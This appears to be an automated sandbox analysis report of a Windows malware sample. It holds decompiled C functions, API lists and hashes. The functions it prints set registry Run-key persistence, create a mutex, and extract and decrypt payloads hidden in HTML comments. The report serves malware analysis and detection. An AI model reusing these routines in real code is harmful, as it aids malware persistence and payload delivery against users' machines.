                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Virtual$Context$Acquire$AllocFree$DestroyErrorExportImportLast$CounterEncryptPerformanceQueryRelease
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 487564122-0
                                                                                                                                                                                                                                                                                          • Opcode ID: cd64014fca8a1fd3dedaf543264f396e97ee9f29ef2d2d9375146d60c3b71fee
                                                                                                                                                                                                                                                                                          • Instruction ID: 75e4ec9ffd75ad85335d37f2dbfda6536f989acb89096578b4a6032df118288e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd64014fca8a1fd3dedaf543264f396e97ee9f29ef2d2d9375146d60c3b71fee
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0711CB6D00208ABEB14EFA4D845FEEB7B4BB48305F14C519EA15B72C0E774EA44CB65
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E040012D0(CHAR* _a4) {
                                                                                                                                                                                                                                                                                          				CHAR* _v8;
                                                                                                                                                                                                                                                                                          				char* _v12;
                                                                                                                                                                                                                                                                                          				CHAR* _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                                                                          				long _t26;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                          					_v16 = _v8;
                                                                                                                                                                                                                                                                                          					_v12 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                                                          					while( *0x4014370 == 0) {
                                                                                                                                                                                                                                                                                          						_v20 = 0x80000001;
                                                                                                                                                                                                                                                                                          						if(( *(_v8 + 0x30c) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          							_v20 = 0x80000002;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                                          						_t26 = RegOpenKeyExA(_v20, _v12, 0, 0xf003f,  &_v24); // executed
                                                                                                                                                                                                                                                                                          						if(_t26 == 0) {
                                                                                                                                                                                                                                                                                          							_v28 = lstrlenA(_v16);
                                                                                                                                                                                                                                                                                          							RegSetValueExA(_v24, _v8 + 0x208, 0, 1, _v16, _v28); // executed
                                                                                                                                                                                                                                                                                          							RegCloseKey(_v24);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                                          0x040012d9
                                                                                                                                                                                                                                                                                          0x040012e0
                                                                                                                                                                                                                                                                                          0x040012e9
                                                                                                                                                                                                                                                                                          0x040012ec
                                                                                                                                                                                                                                                                                          0x040012f3
                                                                                                                                                                                                                                                                                          0x04001301
                                                                                                                                                                                                                                                                                          0x04001314
                                                                                                                                                                                                                                                                                          0x04001316
                                                                                                                                                                                                                                                                                          0x04001316
                                                                                                                                                                                                                                                                                          0x0400131d
                                                                                                                                                                                                                                                                                          0x04001337
                                                                                                                                                                                                                                                                                          0x0400133f
                                                                                                                                                                                                                                                                                          0x0400134b
                                                                                                                                                                                                                                                                                          0x04001368
                                                                                                                                                                                                                                                                                          0x04001372
                                                                                                                                                                                                                                                                                          0x04001372
                                                                                                                                                                                                                                                                                          0x0400137d
                                                                                                                                                                                                                                                                                          0x0400137d
                                                                                                                                                                                                                                                                                          0x040012fc
                                                                                                                                                                                                                                                                                          0x0400138d

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,0400C248,00000000,000F003F,00000000), ref: 04001337
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 04001345
                                                                                                                                                                                                                                                                                          • RegSetValueExA.KERNEL32(00000000,-00000208,00000000,00000001,?,?), ref: 04001368
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04001372
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 0400137D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseOpenSleepValuelstrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3411147897-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 938b7cb6186ad2cb83b89a2b0749dbfdb9b9446470f7ced15d3d2a40044d04a4
                                                                                                                                                                                                                                                                                          • Instruction ID: 889d750eda8961b126f00a9021e235014b30ece64fb5bfebafecfaf2f158f27d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 938b7cb6186ad2cb83b89a2b0749dbfdb9b9446470f7ced15d3d2a40044d04a4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12210070A04309EBEB04CFE4C949BAEB7B4FB44301F108258E641BB280D779AE40DB91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 025521F9
                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 0255223B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719923860.0000000002551000.00000020.00001000.00020000.00000000.sdmp, Offset: 02551000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2551000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorHugeLastRead
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3239643929-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 6d7bad7c208f0ca752512d2f8437f6d4c9aec1adbe57a8f121f6a81433dec321
                                                                                                                                                                                                                                                                                          • Instruction ID: 481c810c577883eaab47a56a44f13214b18a0eacc1452839144f54fb8e2839f9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d7bad7c208f0ca752512d2f8437f6d4c9aec1adbe57a8f121f6a81433dec321
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD81A774A00219EFDB04CF94C890AAEBBB1FF48314F258599ED09AB351D734EA85CF94
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04005E00() {
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				CreateMutexA(0, 0, "pigalicapi"); // executed
                                                                                                                                                                                                                                                                                          				return 0 | GetLastError() == 0x000000b7;
                                                                                                                                                                                                                                                                                          			}



                                                                                                                                                                                                                                                                                          0x04005e0c
                                                                                                                                                                                                                                                                                          0x04005e25

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,04003BEB), ref: 04005E0C
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,04003BEB), ref: 04005E12
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                          • String ID: pigalicapi
                                                                                                                                                                                                                                                                                          • API String ID: 1925916568-2184165135
                                                                                                                                                                                                                                                                                          • Opcode ID: ac3ade5f6374e6b3d28c260e8624ddfb09fc106c0a6a63d5b6af1bc4c66bd4e9
                                                                                                                                                                                                                                                                                          • Instruction ID: c9a096dff23d34124f73a3e8575822b5ba186ec69b5811b6053c60030017a183
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac3ade5f6374e6b3d28c260e8624ddfb09fc106c0a6a63d5b6af1bc4c66bd4e9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAC08C362883186BF2081B61ED4BB893A88C792E81F600030F30AEA0D0999968C08B16
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?,?,?,?,02520005), ref: 025200EB
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,02520005), ref: 02520113
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocInfoNativeSystemVirtual
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2032221330-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                                                                                                                                                                                                                                                                                          • Instruction ID: c886933a93d40633ccbcb4e06460fbd98ef568426ebceb97f756b1d6f12805f7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86E1C571A063268FD714CF59C84073ABBE1FFA6318F04452DE8959B2C1E774E849CB95
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04008250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				signed int _v13;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                                                                                          				char* _v36;
                                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                                                                          				char _t48;
                                                                                                                                                                                                                                                                                          				intOrPtr _t51;
                                                                                                                                                                                                                                                                                          				intOrPtr _t58;
                                                                                                                                                                                                                                                                                          				char _t63;
                                                                                                                                                                                                                                                                                          				void* _t77;
                                                                                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					_v20 = _a4;
                                                                                                                                                                                                                                                                                          					_v13 = 0;
                                                                                                                                                                                                                                                                                          					while(_v12 < _a8 - 0xa && (_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          						_t48 = "<!--"; // 0x2d2d213c
                                                                                                                                                                                                                                                                                          						_v32 = _t48;
                                                                                                                                                                                                                                                                                          						_t63 =  *0x400c700; // 0x0
                                                                                                                                                                                                                                                                                          						_v28 = _t63;
                                                                                                                                                                                                                                                                                          						_t51 = E04007AF0(_v20 + _v12, _a8 - _v12,  &_v32, 4);
                                                                                                                                                                                                                                                                                          						_t78 = _t77 + 0x10;
                                                                                                                                                                                                                                                                                          						_v24 = _t51;
                                                                                                                                                                                                                                                                                          						if(_v24 == 0) {
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_v12 = _v24 - _a4;
                                                                                                                                                                                                                                                                                          							_t28 = _v12 + 4; // 0x4
                                                                                                                                                                                                                                                                                          							_v36 = StrStrA(_v20 + _t28, "-->");
                                                                                                                                                                                                                                                                                          							if(_v36 != 0) {
                                                                                                                                                                                                                                                                                          								_v44 = _v36 - _v24 - 4;
                                                                                                                                                                                                                                                                                          								_t58 = E04008090(_v24 + 4, _v44, _a12, _a16); // executed
                                                                                                                                                                                                                                                                                          								_t77 = _t78 + 0x10;
                                                                                                                                                                                                                                                                                          								_v40 = _t58;
                                                                                                                                                                                                                                                                                          								if(_v40 > 0) {
                                                                                                                                                                                                                                                                                          									_v13 = 1;
                                                                                                                                                                                                                                                                                          									_v8 = _v40;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v12 = _v12 + 4;
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L16:
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                                          0x04008256
                                                                                                                                                                                                                                                                                          0x04008261
                                                                                                                                                                                                                                                                                          0x04008285
                                                                                                                                                                                                                                                                                          0x0400828f
                                                                                                                                                                                                                                                                                          0x04008292
                                                                                                                                                                                                                                                                                          0x04008296
                                                                                                                                                                                                                                                                                          0x040082b1
                                                                                                                                                                                                                                                                                          0x040082b6
                                                                                                                                                                                                                                                                                          0x040082b9
                                                                                                                                                                                                                                                                                          0x040082bf
                                                                                                                                                                                                                                                                                          0x040082d6
                                                                                                                                                                                                                                                                                          0x040082db
                                                                                                                                                                                                                                                                                          0x040082de
                                                                                                                                                                                                                                                                                          0x040082e5
                                                                                                                                                                                                                                                                                          0x040082e7
                                                                                                                                                                                                                                                                                          0x040082ed
                                                                                                                                                                                                                                                                                          0x040082fb
                                                                                                                                                                                                                                                                                          0x04008306
                                                                                                                                                                                                                                                                                          0x0400830d
                                                                                                                                                                                                                                                                                          0x04008318
                                                                                                                                                                                                                                                                                          0x0400832e
                                                                                                                                                                                                                                                                                          0x04008333
                                                                                                                                                                                                                                                                                          0x04008336
                                                                                                                                                                                                                                                                                          0x0400833d
                                                                                                                                                                                                                                                                                          0x0400833f
                                                                                                                                                                                                                                                                                          0x04008346
                                                                                                                                                                                                                                                                                          0x04008346
                                                                                                                                                                                                                                                                                          0x0400834f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400835a
                                                                                                                                                                                                                                                                                          0x0400830d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040082e5
                                                                                                                                                                                                                                                                                          0x04008296
                                                                                                                                                                                                                                                                                          0x0400835f
                                                                                                                                                                                                                                                                                          0x04008365

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000004,-->), ref: 04008300
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008090: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040080D8
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                          • String ID: -->$<!--
                                                                                                                                                                                                                                                                                          • API String ID: 4275171209-1166897919
                                                                                                                                                                                                                                                                                          • Opcode ID: 20dc3e6302552aac322e9474528943c8a2bb7ec5e025690798da4dc1e387ebc2
                                                                                                                                                                                                                                                                                          • Instruction ID: 33a7bc7995a4c535701f75233fb1c46eed47e0fb0959c3fa2371b97aa1c284c8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20dc3e6302552aac322e9474528943c8a2bb7ec5e025690798da4dc1e387ebc2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23311971900249DFEF04EFA8C544BEEBBB1BB88308F14C959D505B7281E774AA84CB96
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E0400A400(char* _a4, char* _a8, char* _a12, int _a16) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                                          				long _t25;
                                                                                                                                                                                                                                                                                          				long _t27;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                                          					_v12 = 0x80000001;
                                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_v12 = 0x80000002;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                                                                                          					_t25 = RegOpenKeyExA(_v12, _a4, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                                                          					if(_t25 == 0) {
                                                                                                                                                                                                                                                                                          						_v20 = _a16;
                                                                                                                                                                                                                                                                                          						_t27 = RegQueryValueExA(_v16, _a8, 0, 0, _a12,  &_v20); // executed
                                                                                                                                                                                                                                                                                          						if(_t27 == 0) {
                                                                                                                                                                                                                                                                                          							_v8 = _v20;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x0400a406
                                                                                                                                                                                                                                                                                          0x0400a411
                                                                                                                                                                                                                                                                                          0x0400a429
                                                                                                                                                                                                                                                                                          0x0400a439
                                                                                                                                                                                                                                                                                          0x0400a43b
                                                                                                                                                                                                                                                                                          0x0400a43b
                                                                                                                                                                                                                                                                                          0x0400a442
                                                                                                                                                                                                                                                                                          0x0400a45c
                                                                                                                                                                                                                                                                                          0x0400a464
                                                                                                                                                                                                                                                                                          0x0400a469
                                                                                                                                                                                                                                                                                          0x0400a480
                                                                                                                                                                                                                                                                                          0x0400a488
                                                                                                                                                                                                                                                                                          0x0400a48d
                                                                                                                                                                                                                                                                                          0x0400a48d
                                                                                                                                                                                                                                                                                          0x0400a494
                                                                                                                                                                                                                                                                                          0x0400a494
                                                                                                                                                                                                                                                                                          0x0400a464
                                                                                                                                                                                                                                                                                          0x0400a4a0

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 0400A45C
                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0400A480
                                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 0400A494
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 26c5e8be6951219e5415309ce84e58fa5b755f2e54e0236dd9c9ae8c1af765fa
                                                                                                                                                                                                                                                                                          • Instruction ID: 715db8aa4ed00a9f1925e7802d1785fb3623660146ed6b0049a8ef53f9c2d8f0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26c5e8be6951219e5415309ce84e58fa5b755f2e54e0236dd9c9ae8c1af765fa
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70110D74A00309EBEB15CF94C848BEF77B8FB84744F14C558E914AB680D7B8AA51CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04008090(intOrPtr _a4, long _a8, void** _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v24;
                                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                                                                          				int _v48;
                                                                                                                                                                                                                                                                                          				long _v52;
                                                                                                                                                                                                                                                                                          				void* _t71;
                                                                                                                                                                                                                                                                                          				intOrPtr _t73;
                                                                                                                                                                                                                                                                                          				void* _t91;
                                                                                                                                                                                                                                                                                          				void* _t93;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v16 = _a8;
                                                                                                                                                                                                                                                                                          					_t71 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          					_v12 = _t71;
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						_t73 = E04001390(_v12, _a4, _v16, _v12, _v16); // executed
                                                                                                                                                                                                                                                                                          						_v20 = _t73;
                                                                                                                                                                                                                                                                                          						if(_v20 != 0) {
                                                                                                                                                                                                                                                                                          							_v24 = _v12;
                                                                                                                                                                                                                                                                                          							_v28 = _v20;
                                                                                                                                                                                                                                                                                          							_v32 = E040087B0(_v20,  *_v24) & 0x0000ffff;
                                                                                                                                                                                                                                                                                          							if(_v32 == 0xa) {
                                                                                                                                                                                                                                                                                          								_v40 =  *((intOrPtr*)(_v24 + 4));
                                                                                                                                                                                                                                                                                          								_v44 =  *((intOrPtr*)(_v24 + 8));
                                                                                                                                                                                                                                                                                          								_v36 = E040016F0(_v24 + 0xc, _v28 - 0xc);
                                                                                                                                                                                                                                                                                          								if(_v36 == _v44) {
                                                                                                                                                                                                                                                                                          									E04008630(_v24 + 0xc, 4, _v40);
                                                                                                                                                                                                                                                                                          									_v48 =  *((intOrPtr*)(_v24 + 0xc));
                                                                                                                                                                                                                                                                                          									E04008630(_v24 + 0x10, _v48, _v40);
                                                                                                                                                                                                                                                                                          									_v52 = _v28 - _v48 + 0x10;
                                                                                                                                                                                                                                                                                          									_t52 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                                                          									_t91 = E04008A70(_v24 + _t52,  &_v52, _v24 + 0x10, _v48, 0x4013410, 0x254); // executed
                                                                                                                                                                                                                                                                                          									if(_t91 != 0) {
                                                                                                                                                                                                                                                                                          										_t93 = VirtualAlloc(0, _v52, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          										 *_a12 = _t93;
                                                                                                                                                                                                                                                                                          										if( *_a12 != 0) {
                                                                                                                                                                                                                                                                                          											_t60 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                                                          											E04007B70( *_a12, _v24 + _t60, _v52);
                                                                                                                                                                                                                                                                                          											 *_a16 = _v52;
                                                                                                                                                                                                                                                                                          											_v8 = _v52;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if(_v8 == 0) {
                                                                                                                                                                                                                                                                                          							VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L13;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                                          0x04008096
                                                                                                                                                                                                                                                                                          0x040080a1
                                                                                                                                                                                                                                                                                          0x04008246
                                                                                                                                                                                                                                                                                          0x0400824c
                                                                                                                                                                                                                                                                                          0x040080c5
                                                                                                                                                                                                                                                                                          0x040080c8
                                                                                                                                                                                                                                                                                          0x040080d8
                                                                                                                                                                                                                                                                                          0x040080de
                                                                                                                                                                                                                                                                                          0x040080e5
                                                                                                                                                                                                                                                                                          0x040080fb
                                                                                                                                                                                                                                                                                          0x04008103
                                                                                                                                                                                                                                                                                          0x0400810a
                                                                                                                                                                                                                                                                                          0x04008113
                                                                                                                                                                                                                                                                                          0x04008119
                                                                                                                                                                                                                                                                                          0x0400812d
                                                                                                                                                                                                                                                                                          0x04008134
                                                                                                                                                                                                                                                                                          0x04008140
                                                                                                                                                                                                                                                                                          0x04008149
                                                                                                                                                                                                                                                                                          0x04008162
                                                                                                                                                                                                                                                                                          0x0400816b
                                                                                                                                                                                                                                                                                          0x0400817e
                                                                                                                                                                                                                                                                                          0x0400818c
                                                                                                                                                                                                                                                                                          0x0400819e
                                                                                                                                                                                                                                                                                          0x040081b1
                                                                                                                                                                                                                                                                                          0x040081d3
                                                                                                                                                                                                                                                                                          0x040081d8
                                                                                                                                                                                                                                                                                          0x040081e2
